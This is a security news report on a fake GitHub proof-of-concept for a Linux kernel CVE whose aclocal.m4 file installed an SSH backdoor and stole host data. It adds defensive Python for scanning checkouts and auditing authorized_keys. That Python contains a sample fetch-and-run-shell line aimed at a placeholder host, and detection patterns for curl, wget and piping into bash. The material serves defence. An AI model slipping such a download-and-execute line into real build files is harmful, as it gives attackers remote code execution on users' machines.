Uptycs warns of fake proof-of-concept repository on GitHub

July 26, 2023 - TuxCare PR Team

Uptycs has discovered a fake proof-of-concept (PoC) repository on GitHub masquerading as a legitimate PoC for CVE-2023-35829, a recently disclosed high-severity flaw in the Linux kernel. The PoC is actually a backdoor that steals sensitive data from compromised hosts and gives threat actors remote access.

Uptycs found that the deceptive repository posed as a PoC for CVE-2023-35829, a high-severity flaw in the Linux kernel. On closer inspection, researchers noticed suspicious activity such as unexpected network connections, unusual data transfers, and unauthorized system access attempts. Digging further, they found that the PoC was a copy of an older, legitimate exploit for another Linux kernel vulnerability, CVE-2022-34918. The only addition was a file named “src/aclocal.m4,” which functioned as a downloader for a Linux bash script and gave the malware its persistence.

The malicious backdoor, disguised as a legitimate PoC, gave threat actors remote access by adding their SSH key to the “.ssh/authorized_keys” file. It also exfiltrated a wide array of data, from hostnames and usernames to exhaustive listings of home directory contents. For anyone who executed the fake PoC, the extent of potential data compromise was high.

The backdoor can steal a wide range of sensitive data, including the hostname, username, home directory contents, and SSH keys. It can also be used to gain remote access to the compromised host by adding the attacker’s SSH key to the “authorized_keys” file.
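As an added example (not code from Uptycs, TuxCare or the page's sources), two defensive checks a practitioner can run around an untrusted PoC: scanning a checkout for build-support files such as aclocal.m4 that reach out to the network, and auditing authorized_keys against a list of keys that were actually provisioned. The sample checkout, key material and host names are constructed placeholders, and the downloader patterns are assumptions, since the page does not quote the real file.

```python
import re

# Markers a reviewer would look for in a build-support file that should hold
# only m4 macros: a network fetch, or fetched content piped into a shell.
# Assumption: the page does not quote the real file, so these are heuristics.
_FETCH_RE = re.compile(r"\b(curl|wget)\b", re.I)
_PIPE_SHELL_RE = re.compile(r"\|\s*(ba)?sh\b")

# Constructed sample checkout modelled on the report: an ordinary source file
# plus an aclocal.m4 that downloads and runs a script (placeholder host).
SAMPLE_REPO = {
    "src/exploit.c": "int main(void) { return 0; }\n",
    "src/aclocal.m4": "dnl autoconf macros\ncurl -s http://example.invalid/s.sh | bash\n",
}
# Constructed authorized_keys: one provisioned key and one that never was.
SAMPLE_AUTHORIZED_KEYS = """\
# constructed sample
ssh-ed25519 AAAAC3KnownKeyMaterial0000 alice@laptop
no-pty,from="10.0.0.5" ssh-rsa AAAAB3UnknownKeyMaterial1111 deploy
"""
KNOWN_KEYS = {"AAAAC3KnownKeyMaterial0000"}

def find_downloader_lines(files):
    """files maps relative path -> text (e.g. read from a cloned checkout).
    Returns [(path, line)] for lines that fetch from the network or pipe into
    a shell; a hit inside an autotools helper is a red flag."""
    hits = []
    for path, text in sorted(files.items()):
        for line in text.splitlines():
            if _FETCH_RE.search(line) or _PIPE_SHELL_RE.search(line):
                hits.append((path, line.strip()))
    return hits

def parse_authorized_keys(text):
    """Yield (keytype, key_material, comment) per key line, skipping blanks
    and comments and dropping a leading options field such as no-pty."""
    for raw in text.splitlines():
        fields = raw.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        # Options precede the key and never start with a key-type prefix.
        while fields and not fields[0].startswith(("ssh-", "ecdsa-", "sk-")):
            fields.pop(0)
        if len(fields) >= 2:
            yield fields[0], fields[1], " ".join(fields[2:])

def unexpected_keys(text, allowlist):
    """Return parsed entries whose key material is not in the allowlist; any
    result on a host that ran an untrusted PoC deserves investigation."""
    return [k for k in parse_authorized_keys(text) if k[1] not in allowlist]
```

The key parser handles the options prefix (no-pty, from=...) so that a planted entry cannot hide from the audit by carrying options in front of the key type.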

Uptycs identified another GitHub profile, ChriSanders22, circulating a fake PoC for VMware Fusion CVE-2023-20871. Remarkably, it had the same aclocal.m4 file triggering the installation of the hidden backdoor. A separate GitHub profile was found hosting yet another fake PoC for CVE-2023-35829.

The discovery follows a previous incident where VulnCheck detected fake GitHub accounts impersonating security researchers to distribute malware under the guise of PoC exploits for widely used software.

The sources for this piece include an article in TheHackerNews.
